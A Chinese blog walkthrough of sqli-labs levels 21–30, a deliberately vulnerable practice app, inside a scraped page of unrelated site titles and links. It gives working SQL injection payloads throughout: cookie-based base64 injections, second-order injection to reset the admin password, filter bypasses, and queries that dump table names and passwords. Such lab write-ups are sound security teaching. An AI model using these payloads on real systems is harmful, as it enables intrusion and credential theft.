当前位置: 首页 > news >正文

上海网站制作 公司/免费企业黄页查询官网

上海网站制作 公司,免费企业黄页查询官网,有哪些免费做外贸网站,响应式网站的优点走过路过不要错过点击蓝字关注我们我最怕的东西是黑暗,而最大的黑暗叫做孤独。我不怕一个人独处,我只怕心里没有人。匠心前言从 Less 18 开始修改 HTTP 头部信息的操作在 Firefox 浏览器的开发者工具也可以做。(f12)less 21源码分析用户输入被 check_inp…

走过路过不要错过

点击蓝字关注我们

我最怕的东西是黑暗,而最大的黑暗叫做孤独。

我不怕一个人独处,我只怕心里没有人。

匠心

前言

从 Less 18 开始修改 HTTP 头部信息的操作在 Firefox 浏览器的开发者工具也可以做。(f12)

48d42cd1da70e57dc805a490c2639f7c.png

5424bcc499773f0dbe29b33f82af509b.png

less 21

源码分析

用户输入被 check_input() 函数过滤

输入正常则产生cookie,并base64编码 

获取cookie并进行数据库查询

90d5362affdd6631b144ab0a10bbdfa7.png

6eb22bcca70f2453b8f334624e8625c7.png

451fa88189373b9b6970de4e7a7412d1.png

漏洞利用

cookie 没有被过滤,可以利用 

直接在 cookie 处构造 payload 进行注入 

cookie 参数进行单引号+括号闭合 

注意 cookie 先进行 base64 编码

提交正确的账号登录,发现 cookie 被 base64 编码

95f02b333ba8620f8cfae3e1da95f4e6.png

构造 payload (使用 Hack bar 自带的 base64 编码器编码),可以看到有数据回显位

uname = ') union select 1,2,3 #uname = JykgdW5pb24gc2VsZWN0IDEsMiwzICM=

aea755118a7429b2a48f798a61f23aa4.png

ddce212163257d2e4d9a35ae65713755.png

less 22

源码分析

用户输入被 check_input() 过滤 

获取 cookie,base64 解码,双引号引用,拼接 sql 语句进行数据库查询并返回数据

099e87c87552aab92cb916abd8041f36.png

bebb187235bdf85f1c2266a5e97ae4a6.png

漏洞利用

随便数据用户参数 

构造 cookie,双引号闭合,base64 编码之后进行注入

查看数据回显

uname = " union select 1,2,3 # uname = IiB1bmlvbiBzZWxlY3QgMSwyLDMgIw==

b59b1ebcfd8d3fa8412566921c0af0b0.png

less 23

源码分析

get 注入 

注释符"#" , "--" 被转义 

参数单引号引用 

有数据回显

65d8c6372363890ff182942be9040c8d.png

漏洞利用

闭合单引号

布尔注入判断第一步,有正常回显

?id= 1' and '1'='1  

ff41d66023926cfb0298ef536cd2916f.png

布尔注入判断第二步,信息不回显

?id= 1' and '1'='2

e45dbcc117ca59d72b5054ec8e63ee44.png

union 注入

查看数据回显

?id= ' union select 1,2,3  '

3ec4043b5cf468ac6043ce892b25700d.png

less 24

源码分析

在登录界面登录之后数据传送到 login.php 处理 

login.php 使用 mysql_real_escape_string 对参数中可能存在的特殊字符前添加反斜杠 

传参正确后页面会重定向到 login_in.php 页面,该页面用于修改账号密码 

输入要修改的密码之后页面会跳转到 pass_change.php 页面进行数据库的密码更新login_create.php 用于创建一个新用户,并将新用户信息插入数据库中

login.php

a1d068b38bb1e99d4b9b9eb500d5778b.png

pass_change.php

74e4adcf5e481b6052509bc29355fdd7.png

login_create.php

02a2866636a89b8513bdccb3ee141905.png

漏洞利用

漏洞点出现在 login_create.php 上 

虽然有使用 mysql_escape_string() 在特殊字符前面添加一个反斜杠,但是在写入数据库的时候反斜杠又被去除了

创建一个用户名为 admin’# 的账号

4e6cdf2b2ed91e7f6e352f906cabd4f6.png

8ba03c8001c451fee299b3efff961a6c.png

d24420b3da71623cb25f811cd529f81f.png

使用 admin’# 进行登录,登录成功后修改密码,在 pass_change.php 的update 更新语句中相当于对管理员的账号 admin 进行修改密码。

f35e0310cec6306a88abcb3588fd340a.png

998756948fc509b89fae91e9eb8436a2.png

0d204f2207afea0f0022a3667065db86.png

用管理员的账号进行登录

104afdcc1548208249ea1bf1fb23cdd2.png

less 25

源码分析

输入参数被过滤(这里的正则不区分大小写) 

单引号引用 

有数据回显

f1e2eb6e51e9d07632ba384d36d2d01b.png

55e6af5c8f90c62f62e923991f68cb96.png

漏洞利用

但凡出现 or  and  字符的地方都使用双写关键字绕过 

闭合单引号 

注释符要转换为URL编码 %23

数据回显

?id=0' union select 1,2,3 %23

b9dec75187d5e4f5e5e6b20ea2ff62d1.png

数据库信息

?id=0' union select 1,database(),version() %23

90e4fff03acf0df2ca916354ef1084d3.png

爆表(ps:information 中的 or 字符会被过滤,所以也需要双写)

?id=0' union select 1,database(),(select group_concat(table_name) from infoorrmation_schema.tables where table_schema='security') %23

b4e91be972bd5994e8982104ff58d00d.png

爆列,爆数据就不赘述了。

less 25a

源码分析

和 Less 25 一样的配方,只不过 SQL 语句在拼接参数的时候没有对参数进行单引号引用。

less 26

源码分析

将以下的字符转义为空: 

or 

and 

注释符:/**/,--,# 

空格 

反斜杠

f5311c01d9043dbb6785426a2e75dcc1.png

漏洞利用

关键字双写绕过 

闭合单引号代替注释符 

%a0 代替空格

布尔注入判断

?id=1' %a0 aandnd %a0 '1'='1

58a7f0145c24eb37aeea6c63300be47c.png

布尔注入判断

?id=1' %a0 aandnd %a0 '1'='2

1d8443cde8cf5eff52205adb8884c0f6.png

union 注入

数字回显

?id=0' %a0 union %a0 select %a0 1,2,3 %a0 '

ef574f04b697d6af6903ace95d89235c.png

数据库信息

?id=0' %a0 union %a0 select %a0 1,database(),version() %a0 '

2a4130f2e04d677ea90d290bcb3a4d57.png

爆表(ps:information --> infoorrmation )

?id=0' %a0 union %a0 select %a0 1,database(),(select %a0 group_concat(table_name) %a0 from %a0 infoorrmation_schema.tables %a0 where %a0 table_schema='security') %a0 '

3a5f7b13308ec323e50c0661632f60e2.png

爆列(ps:information --> infoorrmation ; and --> aandnd)

?id=0' %a0 union %a0 select %a0 1,database(),(select %a0 group_concat(column_name) %a0 from %a0 infoorrmation_schema.columns %a0 where %a0 table_schema='security' %a0 aandnd %a0 table_name='users') %a0 '

4e4d78f3d940245b3f41f7d9f36b6234.png

爆数据(ps:information --> infoorrmation ; password --> passwoorrd)

?id=0' %a0 union %a0 select %a0 1,(select %a0 group_concat(passwoorrd) %a0 from %a0 security.users),(select %a0 group_concat(username) %a0 from %a0 security.users) %a0 '

d7f1133c1d25f3d6b443791174b16ae3.png

less 26a

源码分析

参数被过滤 

单引号+括号引用参数

384494399a6ec08e456fa0cd638ce065.png

漏洞利用

单引号+括号闭合 

其余步骤可参考 Less25

union 注入(数字回显)

?id= 0') %a0 union %a0 select %a0 1,2,3 %a0 aandnd %a0 ('1')=('1  

less 27

源码分析

参数被单引号引用 

被过滤的字符串有:

/**/ 

-- 

空格 

union,select(区分大小写)

ef9b6d61ba232dd95616c845dd5eb8d0.png

漏洞利用

过滤的关键字可以用大小写/双写绕过 

%a0代替空格 

单引号闭合

union注入(数字回显)

?id= 0' %a0 UNion %a0 SElect %a0 1,2,3 %a0 '

c5c601bd7af66608a7b6b260538a34c8.png

less 27a

源码分析

和 Less 27 的差不多,就是参数使用双引号引用,注意双引号闭合即可。

less 28

源码分析

。。。 

单引号+括号引用参数 

此番过滤的字符串更少

aca139bd5acba3bb03219cfa0c2cdbe6.png

漏洞利用

注意单引号+括号闭合 

剩余思路可以参考 Less26a

less 28a

源码分析

啊啊啊。。。。。。

3a0d3c119683a9fa752cebd40c096f91.png

less 29

源码分析

index.php 

这是一个普通 SQL 注入漏洞网页

61526c9b9b7e0c895b88e5865f6a03f3.png

login.php 

该网页意在模拟两层服务器对参数的处理 

参数先经过最外层的 tomcat 服务器处理(Java_implimenttation()和whitelist()) 之后将处理后的参数传递给 apache 服务器处理($id = $_GET['id'])

50add489d11824da1b9f943d799c886d.png

whitelist() 

该函数意在使用正则表达式过滤除了数字之外的字符

c845e3ed60ffeb35164cceffe93a003d.png

java_implimentation() 

该函数意为截取参数的第一个id值

faafe10082caacb2aca2ab261756267d.png

漏洞利用

构造两个 id 值,用 & 连接 

第一个为数字,第二个构造 payload 进行注入 

注释符使用 URL 编码 %23

当直接构造 payload 进行注入时

login.php?id= 0' union select 1,2,3 #

7467c364074bf117764899e95ae77f2b.png

使用两个 id 注入

login.php?id=1&id= 0' union select 1,2,3 %23

d42343fd7d80f0bb7471c3f6a0a9ee40.png

less 30

源码分析

和 Less 29 一样,就是参数由双引号引用,注入时注意双引号闭合即可

尾声

我是匠心,一个在清流旁默默磨剑的匠人,期待那一天能利剑出鞘,仗剑走江湖。

f22ad2534f0a762ee921af17069d9937.png

希望看后能有收益,就够了!
http://www.lbrq.cn/news/1055305.html

相关文章:

  • 做网站本溪/公司网站制作公司
  • 济南正规网站建设公司哪家好/看网站搜索什么关键词
  • 青岛市住房和城乡建设局网站查询/网站推广是什么
  • 建立com网站/营销图片大全
  • 山西省建设注册中心网站首页/北京网站seowyhseo
  • 网站备案只www/百度快照官网
  • asp.net 网站隐藏源代码/李守洪排名大师怎么样
  • 产品素材网站/企业网站快速排名
  • 重庆网站建设找重庆万为/足球排名世界排名
  • 做物流网站/游戏推广员每天做什么
  • 山东建设局网站电工/2022年最新热点素材
  • 中型企业网站建设/郑州百度公司地址
  • 有没有做网站一次付费/网络营销策划的目的
  • 淘宝上做进出口网站有哪些/谷歌play
  • 网站采集被降权/800元做小程序网站
  • 学做游戏 网站/seo推广有哪些
  • 方城企业网站制作哪家好/百度开户
  • 给网站做备案/百度链接提交收录入口
  • 北京html5网站建设/合肥网站优化排名推广
  • 网站备案成功后怎么办/完整的网页设计代码
  • 网站开发命名规范/网络推广工作内容
  • 网站建设人文类/曹操论坛seo
  • frontpage导入网站/免费域名解析平台
  • esc怎么做网站/杭州seo公司服务
  • 手机做网页的软件有哪些/上海谷歌seo公司
  • 北京建设银行网站首页/永久免费开网店app
  • 温州市住房和城乡建设委员会网站/搜索
  • 网站推广的资源合作推广/东莞seo推广机构帖子
  • 哪个网站可以找设计师做设计师/风云榜小说排行榜
  • 展示营销型网站/盐酸达泊西汀片是治疗什么的药物
  • 汇编语言和高级语言的差异
  • C++中的继承:从基础到复杂
  • 【unity实战】使用Unity程序化生成3D随机地牢(附项目源码)
  • python安装部署rknn-toolkit2(ModuleNotFoundError: No module named ‘rknn_toolkit2‘)
  • 解锁高效开发:AWS 前端 Web 与移动应用解决方案详解
  • 进阶向:AI聊天机器人(NLP+DeepSeek API)